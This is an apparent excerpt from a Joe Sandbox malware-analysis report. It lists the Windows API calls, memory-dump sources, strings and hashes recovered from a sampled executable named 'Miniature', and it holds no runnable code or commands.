                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00FE8BB0
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FE8BCC
                                                  • GetLengthSid.ADVAPI32(?), ref: 00FE8BE9
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FE8BF8
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00FE8BFF
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FE8C20
                                                  • CopySid.ADVAPI32(00000000), ref: 00FE8C27
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FE8C58
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FE8C7E
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FE8C92
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 3996160137-0
                                                  • Opcode ID: 1c024a5ccd7995cad9261ede173a9ba1f6e219dabcac143ee8674687bb186d81
                                                  • Instruction ID: 2324d131a2f33caded9ddd01c3a3c7c2f2e0ff5a8662c169d80a5587306bbd6c
                                                  • Opcode Fuzzy Hash: 1c024a5ccd7995cad9261ede173a9ba1f6e219dabcac143ee8674687bb186d81
                                                  • Instruction Fuzzy Hash: BD618F70900249AFDF20EF95DC84EEEBB79FF04350F148159F919A7294DB399A02DB60
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 01007A79
                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 01007A85
                                                  • CreateCompatibleDC.GDI32(?), ref: 01007A91
                                                  • SelectObject.GDI32(00000000,?), ref: 01007A9E
                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 01007AF2
                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01007B2E
                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 01007B52
                                                  • SelectObject.GDI32(00000006,?), ref: 01007B5A
                                                  • DeleteObject.GDI32(?), ref: 01007B63
                                                  • DeleteDC.GDI32(00000006), ref: 01007B6A
                                                  • ReleaseDC.USER32(00000000,?), ref: 01007B75
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                  • String ID: (
                                                  • API String ID: 2598888154-3887548279
                                                  • Opcode ID: 756a8c8d4df40470c17544f3557bb6a13fafea741140aea7c766e7a25f8ae199
                                                  • Instruction ID: fb20c5c5c15421daaf9c90a0d11fe8c8926003a4c79258d0e52ce8145b8ed8e8
                                                  • Opcode Fuzzy Hash: 756a8c8d4df40470c17544f3557bb6a13fafea741140aea7c766e7a25f8ae199
                                                  • Instruction Fuzzy Hash: D0514F71900309EFEB25CF98C884EAEBBB9FF49310F14851DF98997250D739A941CB50
                                                  APIs
                                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00FFA4D4
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 00FFA4F6
                                                  • __swprintf.LIBCMT ref: 00FFA54F
                                                  • __swprintf.LIBCMT ref: 00FFA568
                                                  • _wprintf.LIBCMT ref: 00FFA61E
                                                  • _wprintf.LIBCMT ref: 00FFA63C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                  • API String ID: 311963372-2391861430
                                                  • Opcode ID: d1235e0f47354227e441cf8c9b967552a251393591781b48f57680f52a40862b
                                                  • Instruction ID: 5a34b21677137fc395a59c66885eba00f6747acb20f7a01804760924292dd034
                                                  • Opcode Fuzzy Hash: d1235e0f47354227e441cf8c9b967552a251393591781b48f57680f52a40862b
                                                  • Instruction Fuzzy Hash: 275194B1900119ABCF25EBE0CD86EEEB779BF09340F140165F505B2061EB396F58EB51
                                                  APIs
                                                    • Part of subcall function 00FF951A: __time64.LIBCMT ref: 00FF9524
                                                    • Part of subcall function 00FA4A8C: _fseek.LIBCMT ref: 00FA4AA4
                                                  • __wsplitpath.LIBCMT ref: 00FF97EF
                                                    • Part of subcall function 00FB431E: __wsplitpath_helper.LIBCMT ref: 00FB435E
                                                  • _wcscpy.LIBCMT ref: 00FF9802
                                                  • _wcscat.LIBCMT ref: 00FF9815
                                                  • __wsplitpath.LIBCMT ref: 00FF983A
                                                  • _wcscat.LIBCMT ref: 00FF9850
                                                  • _wcscat.LIBCMT ref: 00FF9863
                                                    • Part of subcall function 00FF9560: _memmove.LIBCMT ref: 00FF9599
                                                    • Part of subcall function 00FF9560: _memmove.LIBCMT ref: 00FF95A8
                                                  • _wcscmp.LIBCMT ref: 00FF97AA
                                                    • Part of subcall function 00FF9CF1: _wcscmp.LIBCMT ref: 00FF9DE1
                                                    • Part of subcall function 00FF9CF1: _wcscmp.LIBCMT ref: 00FF9DF4
                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FF9A0D
                                                  • _wcsncpy.LIBCMT ref: 00FF9A80
                                                  • DeleteFileW.KERNEL32(?,?), ref: 00FF9AB6
                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FF9ACC
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FF9ADD
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FF9AEF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                  • String ID:
                                                  • API String ID: 1500180987-0
                                                  • Opcode ID: 53ff0a81fca1987a3da124f05577b02c63a8853a6182f5ed17f05d4065f0e4d9
                                                  • Instruction ID: 2271f7a26106dae4542e81e0311250c5e91c6f7df452799b4b2e1047a896d83d
                                                  • Opcode Fuzzy Hash: 53ff0a81fca1987a3da124f05577b02c63a8853a6182f5ed17f05d4065f0e4d9
                                                  • Instruction Fuzzy Hash: 35C15CB1D0021DAACF21DF95CC85AEEB7BDEF45310F0040AAF609E7151EBB49A849F65
                                                  APIs
                                                  • _memset.LIBCMT ref: 00FA5BF1
                                                  • GetMenuItemCount.USER32(01057890), ref: 00FE0E7B
                                                  • GetMenuItemCount.USER32(01057890), ref: 00FE0F2B
                                                  • GetCursorPos.USER32(?), ref: 00FE0F6F
                                                  • SetForegroundWindow.USER32(00000000), ref: 00FE0F78
                                                  • TrackPopupMenuEx.USER32(01057890,00000000,?,00000000,00000000,00000000), ref: 00FE0F8B
                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FE0F97
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                  • String ID:
                                                  • API String ID: 2751501086-0
                                                  • Opcode ID: 9a911fa1df0bb7b6329dc82bcc7aca1f605275474f51839ecc8be958b572fb59
                                                  • Instruction ID: ab2beac1aadd0ad736c3d5ecf46a966635ad239bb340048842610fb2926cd73c
                                                  • Opcode Fuzzy Hash: 9a911fa1df0bb7b6329dc82bcc7aca1f605275474f51839ecc8be958b572fb59
                                                  • Instruction Fuzzy Hash: 7471F070A00759BEEB309F65CC85FAABF64FF05764F200216F6146A1D0CBB568A0EB90
                                                  APIs
                                                    • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                  • _memset.LIBCMT ref: 00FE8489
                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FE84BE
                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FE84DA
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FE84F6
                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FE8520
                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00FE8548
                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FE8553
                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FE8558
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                  • API String ID: 1411258926-22481851
                                                  • Opcode ID: 8e058ab22536f514e0300e6d853da64a60c7df5242ac3cf7093f090c20a8023d
                                                  • Instruction ID: 98a172fad52d5c39c04394bb36f7d3189707011a11896b3671d091f58835090a
                                                  • Opcode Fuzzy Hash: 8e058ab22536f514e0300e6d853da64a60c7df5242ac3cf7093f090c20a8023d
                                                  • Instruction Fuzzy Hash: 674124B6C1022DABCB21EBA4DC95DEEB7B8FF08350F054129F845A3155EA399E05DB90
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101040D,?,?), ref: 01011491
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                  • API String ID: 3964851224-909552448
                                                  • Opcode ID: ca3a949d63db6b12c81f879a321ff2d9a5a734bffb72176be1b303204f1ac7e4
                                                  • Instruction ID: 4ffd97e177b1cae6260fdd4257ce3380316d9f0af30ff6a6f50bc04bf7a82db2
                                                  • Opcode Fuzzy Hash: ca3a949d63db6b12c81f879a321ff2d9a5a734bffb72176be1b303204f1ac7e4
                                                  • Instruction Fuzzy Hash: 4141697050121ACBDF15EFA4DD80AEA3764BF06300F544454FED2572A6DF38E919DB60
                                                  APIs
                                                    • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                    • Part of subcall function 00FA153B: _memmove.LIBCMT ref: 00FA15C4
                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00FF58EB
                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00FF5901
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FF5912
                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00FF5924
                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00FF5935
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: SendString$_memmove
                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                  • API String ID: 2279737902-1007645807
                                                  • Opcode ID: d91c57fb30618741deaf296ae699b69126843facf1f0c403e6e5f5a665396fa7
                                                  • Instruction ID: 5c61114304627a58e81da30862801047f512111408bff99b4f622f3af2f65a98
                                                  • Opcode Fuzzy Hash: d91c57fb30618741deaf296ae699b69126843facf1f0c403e6e5f5a665396fa7
                                                  • Instruction Fuzzy Hash: 2911B2B195012DBAD734A7A3CC9ADFF7B7CFFD2F51F400429B941A6090DAA09D04D5A0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                  • String ID: 0.0.0.0
                                                  • API String ID: 208665112-3771769585
                                                  • Opcode ID: 10c1671c7b5260ea16b0fe9299efb921d6942dea009f49b67e14e202f0c9b61b
                                                  • Instruction ID: b541e4983d3b03271f1a656b9cc5cc79cfbc8d0b169c5153bfc1c321ee0b0272
                                                  • Opcode Fuzzy Hash: 10c1671c7b5260ea16b0fe9299efb921d6942dea009f49b67e14e202f0c9b61b
                                                  • Instruction Fuzzy Hash: BD113A3190520CABCB31BB619C4AEFB77BCDF41720F1402A5F28896095FF79A981AB50
                                                  APIs
                                                  • timeGetTime.WINMM ref: 00FF5535
                                                    • Part of subcall function 00FB083E: timeGetTime.WINMM(?,00000002,00F9C22C), ref: 00FB0842
                                                  • Sleep.KERNEL32(0000000A), ref: 00FF5561
                                                  • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00FF5585
                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00FF55A7
                                                  • SetActiveWindow.USER32 ref: 00FF55C6
                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00FF55D4
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00FF55F3
                                                  • Sleep.KERNEL32(000000FA), ref: 00FF55FE
                                                  • IsWindow.USER32 ref: 00FF560A
                                                  • EndDialog.USER32(00000000), ref: 00FF561B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                  • String ID: BUTTON
                                                  • API String ID: 1194449130-3405671355
                                                  • Opcode ID: 3e6b85befa8d07b0d0acac17021c2dc9ff0da0fbd6df8d4de0c27d567091fdfa
                                                  • Instruction ID: c014b8c759ade12b3551e3fb464e4039fcbc6c17c29a7eafbf398ae183fb1dba
                                                  • Opcode Fuzzy Hash: 3e6b85befa8d07b0d0acac17021c2dc9ff0da0fbd6df8d4de0c27d567091fdfa
                                                  • Instruction Fuzzy Hash: A4219A70204708AFEB715F61EC88B363B6AEB48B58F285019F781C116DCA7A8D40EB61
                                                  APIs
                                                    • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                    • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                  • CoInitialize.OLE32(00000000), ref: 00FFDC2D
                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00FFDCC0
                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00FFDCD4
                                                  • CoCreateInstance.OLE32(01023D4C,00000000,00000001,0104B86C,?), ref: 00FFDD20
                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00FFDD8F
                                                  • CoTaskMemFree.OLE32(?,?), ref: 00FFDDE7
                                                  • _memset.LIBCMT ref: 00FFDE24
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00FFDE60
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00FFDE83
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00FFDE8A
                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00FFDEC1
                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 00FFDEC3
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                  • String ID:
                                                  • API String ID: 1246142700-0
                                                  • Opcode ID: 9a1211c77120f0d5bdc019077d7485c2a97b3c634aed77e5bd5f72ee864167df
                                                  • Instruction ID: 5fd6780c11875f579e5adcfc443fdc4d70977dbc2d4f7fcb560c81710216cb51
                                                  • Opcode Fuzzy Hash: 9a1211c77120f0d5bdc019077d7485c2a97b3c634aed77e5bd5f72ee864167df
                                                  • Instruction Fuzzy Hash: 58B1F975A00209AFDB14DFA4C888DAEBBB9FF48314B108459F909EB361DB35EE41DB50
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 00FF0896
                                                  • SetKeyboardState.USER32(?), ref: 00FF0901
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00FF0921
                                                  • GetKeyState.USER32(000000A0), ref: 00FF0938
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00FF0967
                                                  • GetKeyState.USER32(000000A1), ref: 00FF0978
                                                  • GetAsyncKeyState.USER32(00000011), ref: 00FF09A4
                                                  • GetKeyState.USER32(00000011), ref: 00FF09B2
                                                  • GetAsyncKeyState.USER32(00000012), ref: 00FF09DB
                                                  • GetKeyState.USER32(00000012), ref: 00FF09E9
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00FF0A12
                                                  • GetKeyState.USER32(0000005B), ref: 00FF0A20
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: ba2d5df48995b53f07631025e7963df698f81bda3e657ef2ab469e000b24872e
                                                  • Instruction ID: e80375660f0cc57fbbcb4997531399d1179553f7da5deee961d55847f0b6e525
                                                  • Opcode Fuzzy Hash: ba2d5df48995b53f07631025e7963df698f81bda3e657ef2ab469e000b24872e
                                                  • Instruction Fuzzy Hash: 6851C930D0478C69FB35DBA088147BABFB49F013A0F084599D6C2575D3EEA89A4CD795
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000001), ref: 00FECE1C
                                                  • GetWindowRect.USER32(00000000,?), ref: 00FECE2E
                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00FECE8C
                                                  • GetDlgItem.USER32(?,00000002), ref: 00FECE97
                                                  • GetWindowRect.USER32(00000000,?), ref: 00FECEA9
                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00FECEFD
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00FECF0B
                                                  • GetWindowRect.USER32(00000000,?), ref: 00FECF1C
                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00FECF5F
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00FECF6D
                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FECF8A
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00FECF97
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                  • String ID:
                                                  • API String ID: 3096461208-0
                                                  • Opcode ID: e6245e5b5986abf3932ab56099900ca93b9e752ac0208136d76df4c036560071
                                                  • Instruction ID: 02f2eb3f8333637ce52fce36240f0668fd66a88f2ccbbfed9c5bf64bc0c504c7
                                                  • Opcode Fuzzy Hash: e6245e5b5986abf3932ab56099900ca93b9e752ac0208136d76df4c036560071
                                                  • Instruction Fuzzy Hash: 0C513071F00305AFDB28CF69CD99AAEBBB6FB88710F248129F515D7294D7719D018B50
                                                  APIs
                                                    • Part of subcall function 00F91F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F92412,?,00000000,?,?,?,?,00F91AA7,00000000,?), ref: 00F91F76
                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00F924AF
                                                  • KillTimer.USER32(-00000001,?,?,?,?,00F91AA7,00000000,?,?,00F91EBE,?,?), ref: 00F9254A
